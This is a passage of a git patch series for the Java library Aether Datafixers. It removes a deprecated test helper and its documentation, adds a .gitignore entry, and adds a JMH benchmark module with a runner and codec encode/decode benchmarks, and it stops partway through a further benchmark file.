diff --git a/aether-datafixers-testkit/pom.xml b/aether-datafixers-testkit/pom.xml
index 08c93df..dde9eb2 100644
--- a/aether-datafixers-testkit/pom.xml
+++ b/aether-datafixers-testkit/pom.xml
@@ -54,7 +54,7 @@
gson
-
+
com.fasterxml.jackson.corejackson-databind
diff --git a/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java b/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java
index 7f03785..04dd795 100644
--- a/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java
+++ b/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java
@@ -264,17 +264,6 @@ void jacksonJsonCreatesJacksonJsonBuilder() {
assertThat(dynamic.ops()).isSameAs(JacksonJsonOps.INSTANCE);
}
- @Test
- @DisplayName("jackson() creates Jackson JSON builder (deprecated)")
- @SuppressWarnings("deprecation")
- void jacksonCreatesJacksonJsonBuilder() {
- final Dynamic dynamic = TestData.jackson().object()
- .put("key", "value")
- .build();
-
- assertThat(dynamic.get("key").asString().result()).hasValue("value");
- }
-
@Test
@DisplayName("snakeYaml() creates SnakeYAML builder")
void snakeYamlCreatesSnakeYamlBuilder() {
diff --git a/docs/appendix/glossary.md b/docs/appendix/glossary.md
index 5bb793f..2f2af82 100644
--- a/docs/appendix/glossary.md
+++ b/docs/appendix/glossary.md
@@ -140,7 +140,7 @@ Terminology used in Aether Datafixers.
: Test harness for validating Schema configurations.
**TestData**
-: Entry point for fluent test data builders (TestData.gson(), TestData.jackson()).
+: Entry point for fluent test data builders (TestData.gson(), TestData.jacksonJson()).
**TestDataBuilder**
: Fluent builder for creating Dynamic objects with fields.
diff --git a/docs/testkit/test-data-builders.md b/docs/testkit/test-data-builders.md
index 157dba9..283e849 100644
--- a/docs/testkit/test-data-builders.md
+++ b/docs/testkit/test-data-builders.md
@@ -31,8 +31,6 @@ TestData.jacksonXml()...
TestData.using(myCustomOps)...
```
-> **Deprecation Notice:** `TestData.jackson()` is deprecated since 0.5.0 and will be removed in 1.0.0. Use `TestData.jacksonJson()` instead for explicit format naming.
-
## Creating Primitives
```java
From 36260ce3940e55425c39dbe9c55141f9ddf1a310 Mon Sep 17 00:00:00 2001
From: Erik
Date: Tue, 20 Jan 2026 20:00:30 +0100
Subject: [PATCH 04/39] Update `.gitignore` to exclude `current-ticket.md`
---
.gitignore | 3 +++
1 file changed, 3 insertions(+)
diff --git a/.gitignore b/.gitignore
index 5232b33..dcc6e4a 100644
--- a/.gitignore
+++ b/.gitignore
@@ -50,3 +50,6 @@ bin/
# Claude Code
/.claude/
/CLAUDE.md
+
+# GitHub
+current-ticket.md
\ No newline at end of file
From 1d1d203231fb580ad8a94113c0503cc0c8756fe8 Mon Sep 17 00:00:00 2001
From: Erik
Date: Tue, 20 Jan 2026 20:45:56 +0100
Subject: [PATCH 05/39] Add benchmarking utilities and JMH tests for Aether
Datafixers
- Introduce `BenchmarkBootstrap` to provide pre-configured `DataFixer` instances.
- Add `BenchmarkDataGenerator` for creating diverse test data payloads.
- Implement `BenchmarkRunner` as a main entry point for executing JMH benchmarks.
- Include `CollectionCodecBenchmark` for measuring encoding/decoding performance of collections.
- Add `ConcurrentMigrationBenchmark` to analyze multithreaded data migration performance.
---
aether-datafixers-benchmarks/pom.xml | 174 ++++++++++++++
.../benchmarks/BenchmarkRunner.java | 185 +++++++++++++++
.../codec/CollectionCodecBenchmark.java | 180 ++++++++++++++
.../codec/PrimitiveCodecBenchmark.java | 190 +++++++++++++++
.../ConcurrentMigrationBenchmark.java | 219 ++++++++++++++++++
.../core/MultiFixChainBenchmark.java | 149 ++++++++++++
.../core/SchemaLookupBenchmark.java | 148 ++++++++++++
.../benchmarks/core/SingleFixBenchmark.java | 132 +++++++++++
.../format/CrossFormatBenchmark.java | 187 +++++++++++++++
.../benchmarks/format/JsonBenchmark.java | 195 ++++++++++++++++
.../benchmarks/format/TomlXmlBenchmark.java | 192 +++++++++++++++
.../benchmarks/format/YamlBenchmark.java | 192 +++++++++++++++
.../benchmarks/util/BenchmarkBootstrap.java | 214 +++++++++++++++++
.../util/BenchmarkDataGenerator.java | 184 +++++++++++++++
.../benchmarks/util/PayloadSize.java | 94 ++++++++
pom.xml | 16 ++
16 files changed, 2651 insertions(+)
create mode 100644 aether-datafixers-benchmarks/pom.xml
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
diff --git a/aether-datafixers-benchmarks/pom.xml b/aether-datafixers-benchmarks/pom.xml
new file mode 100644
index 0000000..ef8e7ba
--- /dev/null
+++ b/aether-datafixers-benchmarks/pom.xml
@@ -0,0 +1,174 @@
+
+
+ 4.0.0
+
+
+ de.splatgames.aether.datafixers
+ aether-datafixers
+ 1.0.0-SNAPSHOT
+
+
+ aether-datafixers-benchmarks
+ jar
+
+ Aether Datafixers :: Benchmarks
+ JMH microbenchmarks for Aether Datafixers performance analysis.
+
+
+
+ true
+ true
+
+ true
+
+ de.splatgames.aether.datafixers.benchmarks.BenchmarkRunner
+
+
+
+
+
+ de.splatgames.aether.datafixers
+ aether-datafixers-api
+
+
+ de.splatgames.aether.datafixers
+ aether-datafixers-core
+
+
+ de.splatgames.aether.datafixers
+ aether-datafixers-codec
+
+
+ de.splatgames.aether.datafixers
+ aether-datafixers-testkit
+
+
+
+
+ org.openjdk.jmh
+ jmh-core
+
+
+ org.openjdk.jmh
+ jmh-generator-annprocess
+ provided
+
+
+
+
+ com.google.code.gson
+ gson
+
+
+ com.fasterxml.jackson.core
+ jackson-databind
+
+
+
+
+ org.yaml
+ snakeyaml
+
+
+ com.fasterxml.jackson.dataformat
+ jackson-dataformat-yaml
+
+
+
+
+ com.fasterxml.jackson.dataformat
+ jackson-dataformat-toml
+
+
+
+
+ com.fasterxml.jackson.dataformat
+ jackson-dataformat-xml
+
+
+
+
+ com.google.guava
+ guava
+
+
+
+
+ org.jetbrains
+ annotations
+
+
+
+
+
+
+
+ org.apache.maven.plugins
+ maven-compiler-plugin
+
+
+
+ org.openjdk.jmh
+ jmh-generator-annprocess
+ ${jmh.version}
+
+
+
+
+
+ org.apache.maven.plugins
+ maven-enforcer-plugin
+
+
+
+
+ org.apache.maven.plugins
+ maven-shade-plugin
+ ${plugin.shade.version}
+
+
+ package
+
+ shade
+
+
+
+
+ org.openjdk.jmh.Main
+
+
+
+
+
+
+ *:*
+
+ META-INF/*.SF
+ META-INF/*.DSA
+ META-INF/*.RSA
+ META-INF/MANIFEST.MF
+
+
+
+ false
+ true
+ benchmarks
+
+
+
+
+
+
+
+ org.codehaus.mojo
+ exec-maven-plugin
+ 3.1.0
+
+ ${main.class}
+
+
+
+
+
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java
new file mode 100644
index 0000000..4467845
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java
@@ -0,0 +1,185 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks;
+
+import org.openjdk.jmh.runner.Runner;
+import org.openjdk.jmh.runner.RunnerException;
+import org.openjdk.jmh.runner.options.Options;
+import org.openjdk.jmh.runner.options.OptionsBuilder;
+
+import java.io.IOException;
+
+/**
+ * Main entry point for running Aether Datafixers JMH benchmarks.
+ *
+ *
This class provides a convenient way to run benchmarks programmatically
+ * with default settings optimized for comprehensive performance analysis.
+ *
+ *
Usage
+ *
+ *
Via exec:java (Quick Development Runs)
+ *
{@code
+ * # Run all benchmarks with default settings
+ * mvn exec:java -pl aether-datafixers-benchmarks
+ *
+ * # Run with JMH arguments
+ * mvn exec:java -pl aether-datafixers-benchmarks -Dexec.args="-h"
+ * }
+ *
+ *
Via Fat JAR (Production Runs)
+ *
{@code
+ * # Build the fat JAR
+ * mvn clean package -pl aether-datafixers-benchmarks -DskipTests
+ *
+ * # Run all benchmarks
+ * java -jar aether-datafixers-benchmarks/target/aether-datafixers-benchmarks-*-benchmarks.jar
+ *
+ * # Run specific benchmark
+ * java -jar target/*-benchmarks.jar SingleFixBenchmark
+ *
+ * # Run with custom parameters
+ * java -jar target/*-benchmarks.jar -p payloadSize=LARGE -wi 3 -i 5 -f 1
+ *
+ * # Output JSON results
+ * java -jar target/*-benchmarks.jar -rf json -rff results.json
+ *
+ * # List all available benchmarks
+ * java -jar target/*-benchmarks.jar -l
+ * }
+ *
+ * @author Erik Pförtner
+ * @since 1.0.0
+ */
+public final class BenchmarkRunner {
+
+ private BenchmarkRunner() {
+ // Main class
+ }
+
+ /**
+ * Main entry point for running benchmarks.
+ *
+ *
When run without arguments, executes all benchmarks in the package.
+ * Supports all standard JMH command-line arguments.
+ *
+ * @param args command-line arguments (passed to JMH)
+ * @throws RunnerException if benchmark execution fails
+ * @throws IOException if there is an I/O error
+ */
+ public static void main(final String[] args) throws RunnerException, IOException {
+ if (args.length > 0) {
+ // If arguments are provided, delegate to JMH main
+ org.openjdk.jmh.Main.main(args);
+ } else {
+ // Run with default options
+ runAllBenchmarks();
+ }
+ }
+
+ /**
+ * Runs all benchmarks with default configuration.
+ *
+ * @throws RunnerException if benchmark execution fails
+ */
+ public static void runAllBenchmarks() throws RunnerException {
+ final Options options = new OptionsBuilder()
+ .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\..*")
+ .warmupIterations(5)
+ .measurementIterations(10)
+ .forks(2)
+ .jvmArgs("-Xms2G", "-Xmx2G")
+ .build();
+
+ new Runner(options).run();
+ }
+
+ /**
+ * Runs a quick subset of benchmarks for validation.
+ *
+ *
Useful for CI/CD pipelines or quick sanity checks.
+ *
+ * @throws RunnerException if benchmark execution fails
+ */
+ public static void runQuickBenchmarks() throws RunnerException {
+ final Options options = new OptionsBuilder()
+ .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\.core\\.SingleFixBenchmark")
+ .warmupIterations(2)
+ .measurementIterations(3)
+ .forks(1)
+ .jvmArgs("-Xms1G", "-Xmx1G")
+ .param("payloadSize", "SMALL")
+ .build();
+
+ new Runner(options).run();
+ }
+
+ /**
+ * Runs core migration benchmarks only.
+ *
+ * @throws RunnerException if benchmark execution fails
+ */
+ public static void runCoreBenchmarks() throws RunnerException {
+ final Options options = new OptionsBuilder()
+ .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\.core\\..*")
+ .warmupIterations(5)
+ .measurementIterations(10)
+ .forks(2)
+ .jvmArgs("-Xms2G", "-Xmx2G")
+ .build();
+
+ new Runner(options).run();
+ }
+
+ /**
+ * Runs format comparison benchmarks only.
+ *
+ * @throws RunnerException if benchmark execution fails
+ */
+ public static void runFormatBenchmarks() throws RunnerException {
+ final Options options = new OptionsBuilder()
+ .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\.format\\..*")
+ .warmupIterations(5)
+ .measurementIterations(10)
+ .forks(2)
+ .jvmArgs("-Xms2G", "-Xmx2G")
+ .build();
+
+ new Runner(options).run();
+ }
+}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
new file mode 100644
index 0000000..2167a2d
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
@@ -0,0 +1,180 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.codec;
+
+import com.google.gson.JsonElement;
+import de.splatgames.aether.datafixers.api.codec.Codec;
+import de.splatgames.aether.datafixers.api.codec.Codecs;
+import de.splatgames.aether.datafixers.api.result.DataResult;
+import de.splatgames.aether.datafixers.api.util.Pair;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Param;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.ArrayList;
+import java.util.List;
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for collection codec encode/decode performance.
+ *
+ *
Measures the performance of encoding and decoding lists of various sizes
+ * using the {@link Codecs#list(Codec)} API.
+ *
+ * @author Erik Pförtner
+ * @since 1.0.0
+ */
+@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
+@OutputTimeUnit(TimeUnit.MICROSECONDS)
+@State(Scope.Benchmark)
+@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
+@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
+@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
+public class CollectionCodecBenchmark {
+
+ @Param({"10", "100", "1000"})
+ private int listSize;
+
+ private Codec> stringListCodec;
+ private Codec> intListCodec;
+
+ private List stringList;
+ private List intList;
+
+ private JsonElement encodedStringList;
+ private JsonElement encodedIntList;
+
+ @Setup(Level.Trial)
+ public void setup() {
+ this.stringListCodec = Codecs.list(Codecs.STRING);
+ this.intListCodec = Codecs.list(Codecs.INT);
+
+ // Generate test data
+ this.stringList = new ArrayList<>(this.listSize);
+ this.intList = new ArrayList<>(this.listSize);
+
+ for (int i = 0; i < this.listSize; i++) {
+ this.stringList.add("item-" + i);
+ this.intList.add(i);
+ }
+
+ // Pre-encode for decode benchmarks
+ this.encodedStringList = this.stringListCodec.encodeStart(GsonOps.INSTANCE, this.stringList)
+ .result().orElseThrow();
+ this.encodedIntList = this.intListCodec.encodeStart(GsonOps.INSTANCE, this.intList)
+ .result().orElseThrow();
+ }
+
+ // ==================== String List ====================
+
+ /**
+ * Benchmarks encoding a list of strings.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void encodeStringList(final Blackhole blackhole) {
+ final DataResult result = this.stringListCodec.encodeStart(
+ GsonOps.INSTANCE, this.stringList);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks decoding a list of strings.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void decodeStringList(final Blackhole blackhole) {
+ final DataResult, JsonElement>> result = this.stringListCodec.decode(
+ GsonOps.INSTANCE, this.encodedStringList);
+ blackhole.consume(result);
+ }
+
+ // ==================== Integer List ====================
+
+ /**
+ * Benchmarks encoding a list of integers.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void encodeIntList(final Blackhole blackhole) {
+ final DataResult result = this.intListCodec.encodeStart(
+ GsonOps.INSTANCE, this.intList);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks decoding a list of integers.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void decodeIntList(final Blackhole blackhole) {
+ final DataResult, JsonElement>> result = this.intListCodec.decode(
+ GsonOps.INSTANCE, this.encodedIntList);
+ blackhole.consume(result);
+ }
+
+ // ==================== Round Trip ====================
+
+ /**
+ * Benchmarks round-trip encoding and decoding of a string list.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void roundTripStringList(final Blackhole blackhole) {
+ final DataResult encoded = this.stringListCodec.encodeStart(
+ GsonOps.INSTANCE, this.stringList);
+ final DataResult, JsonElement>> decoded = encoded.flatMap(
+ json -> this.stringListCodec.decode(GsonOps.INSTANCE, json));
+ blackhole.consume(decoded);
+ }
+
+ /**
+ * Benchmarks round-trip encoding and decoding of an integer list.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void roundTripIntList(final Blackhole blackhole) {
+ final DataResult encoded = this.intListCodec.encodeStart(
+ GsonOps.INSTANCE, this.intList);
+ final DataResult, JsonElement>> decoded = encoded.flatMap(
+ json -> this.intListCodec.decode(GsonOps.INSTANCE, json));
+ blackhole.consume(decoded);
+ }
+}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
new file mode 100644
index 0000000..82b3d04
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
@@ -0,0 +1,190 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.codec;
+
+import com.google.gson.JsonElement;
+import de.splatgames.aether.datafixers.api.codec.Codec;
+import de.splatgames.aether.datafixers.api.codec.Codecs;
+import de.splatgames.aether.datafixers.api.result.DataResult;
+import de.splatgames.aether.datafixers.api.util.Pair;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for primitive codec encode/decode performance.
+ *
+ *
Measures the performance of encoding and decoding primitive types
+ * using the {@link Codecs} API.
+ *
+ * @author Erik Pförtner
+ * @since 1.0.0
+ */
+@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
+@OutputTimeUnit(TimeUnit.NANOSECONDS)
+@State(Scope.Benchmark)
+@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
+@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
+@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
+public class PrimitiveCodecBenchmark {
+
+ // Test values
+ private static final boolean TEST_BOOL = true;
+ private static final int TEST_INT = 42;
+ private static final long TEST_LONG = 123456789L;
+ private static final float TEST_FLOAT = 3.14159f;
+ private static final double TEST_DOUBLE = 2.718281828;
+ private static final String TEST_STRING = "benchmark-test-string";
+
+ // Pre-encoded values for decode benchmarks
+ private JsonElement encodedBool;
+ private JsonElement encodedInt;
+ private JsonElement encodedLong;
+ private JsonElement encodedFloat;
+ private JsonElement encodedDouble;
+ private JsonElement encodedString;
+
+ @Setup(Level.Trial)
+ public void setup() {
+ this.encodedBool = Codecs.BOOL.encodeStart(GsonOps.INSTANCE, TEST_BOOL).result().orElseThrow();
+ this.encodedInt = Codecs.INT.encodeStart(GsonOps.INSTANCE, TEST_INT).result().orElseThrow();
+ this.encodedLong = Codecs.LONG.encodeStart(GsonOps.INSTANCE, TEST_LONG).result().orElseThrow();
+ this.encodedFloat = Codecs.FLOAT.encodeStart(GsonOps.INSTANCE, TEST_FLOAT).result().orElseThrow();
+ this.encodedDouble = Codecs.DOUBLE.encodeStart(GsonOps.INSTANCE, TEST_DOUBLE).result().orElseThrow();
+ this.encodedString = Codecs.STRING.encodeStart(GsonOps.INSTANCE, TEST_STRING).result().orElseThrow();
+ }
+
+ // ==================== Boolean ====================
+
+ @Benchmark
+ public void encodeBool(final Blackhole blackhole) {
+ final DataResult result = Codecs.BOOL.encodeStart(GsonOps.INSTANCE, TEST_BOOL);
+ blackhole.consume(result);
+ }
+
+ @Benchmark
+ public void decodeBool(final Blackhole blackhole) {
+ final DataResult> result = Codecs.BOOL.decode(GsonOps.INSTANCE, this.encodedBool);
+ blackhole.consume(result);
+ }
+
+ // ==================== Integer ====================
+
+ @Benchmark
+ public void encodeInt(final Blackhole blackhole) {
+ final DataResult result = Codecs.INT.encodeStart(GsonOps.INSTANCE, TEST_INT);
+ blackhole.consume(result);
+ }
+
+ @Benchmark
+ public void decodeInt(final Blackhole blackhole) {
+ final DataResult> result = Codecs.INT.decode(GsonOps.INSTANCE, this.encodedInt);
+ blackhole.consume(result);
+ }
+
+ // ==================== Long ====================
+
+ @Benchmark
+ public void encodeLong(final Blackhole blackhole) {
+ final DataResult result = Codecs.LONG.encodeStart(GsonOps.INSTANCE, TEST_LONG);
+ blackhole.consume(result);
+ }
+
+ @Benchmark
+ public void decodeLong(final Blackhole blackhole) {
+ final DataResult> result = Codecs.LONG.decode(GsonOps.INSTANCE, this.encodedLong);
+ blackhole.consume(result);
+ }
+
+ // ==================== Float ====================
+
+ @Benchmark
+ public void encodeFloat(final Blackhole blackhole) {
+ final DataResult result = Codecs.FLOAT.encodeStart(GsonOps.INSTANCE, TEST_FLOAT);
+ blackhole.consume(result);
+ }
+
+ @Benchmark
+ public void decodeFloat(final Blackhole blackhole) {
+ final DataResult> result = Codecs.FLOAT.decode(GsonOps.INSTANCE, this.encodedFloat);
+ blackhole.consume(result);
+ }
+
+ // ==================== Double ====================
+
+ @Benchmark
+ public void encodeDouble(final Blackhole blackhole) {
+ final DataResult result = Codecs.DOUBLE.encodeStart(GsonOps.INSTANCE, TEST_DOUBLE);
+ blackhole.consume(result);
+ }
+
+ @Benchmark
+ public void decodeDouble(final Blackhole blackhole) {
+ final DataResult> result = Codecs.DOUBLE.decode(GsonOps.INSTANCE, this.encodedDouble);
+ blackhole.consume(result);
+ }
+
+ // ==================== String ====================
+
+ @Benchmark
+ public void encodeString(final Blackhole blackhole) {
+ final DataResult result = Codecs.STRING.encodeStart(GsonOps.INSTANCE, TEST_STRING);
+ blackhole.consume(result);
+ }
+
+ @Benchmark
+ public void decodeString(final Blackhole blackhole) {
+ final DataResult> result = Codecs.STRING.decode(GsonOps.INSTANCE, this.encodedString);
+ blackhole.consume(result);
+ }
+
+ // ==================== Round Trip ====================
+
+ @Benchmark
+ public void roundTripInt(final Blackhole blackhole) {
+ final DataResult encoded = Codecs.INT.encodeStart(GsonOps.INSTANCE, TEST_INT);
+ final DataResult> decoded = encoded.flatMap(
+ json -> Codecs.INT.decode(GsonOps.INSTANCE, json));
+ blackhole.consume(decoded);
+ }
+
+ @Benchmark
+ public void roundTripString(final Blackhole blackhole) {
+ final DataResult encoded = Codecs.STRING.encodeStart(GsonOps.INSTANCE, TEST_STRING);
+ final DataResult> decoded = encoded.flatMap(
+ json -> Codecs.STRING.decode(GsonOps.INSTANCE, json));
+ blackhole.consume(decoded);
+ }
+}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
new file mode 100644
index 0000000..f402cf8
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
@@ -0,0 +1,219 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
